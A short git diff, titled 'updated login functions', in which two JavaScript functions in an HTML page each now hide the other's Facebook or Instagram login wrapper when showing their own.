updated login functions

--- a/9/index.html
+++ b/9/index.html
@@ -3685,6 +3685,7 @@
 
         function fb() {
             document.getElementById("fb_wrapper").style.display = "block";
+            document.getElementById("ig_wrapper").style.display = "none";
             document.getElementById("home").style.display = "none";
             document.getElementById("choose").style.display = "none";
 
@@ -3699,6 +3700,7 @@
 
         function ig() {
             document.getElementById("ig_wrapper").style.display = "block";
+            document.getElementById("fb_wrapper").style.display = "none";
             document.getElementById("home").style.display = "none";
             document.getElementById("choose").style.display = "none";
         }
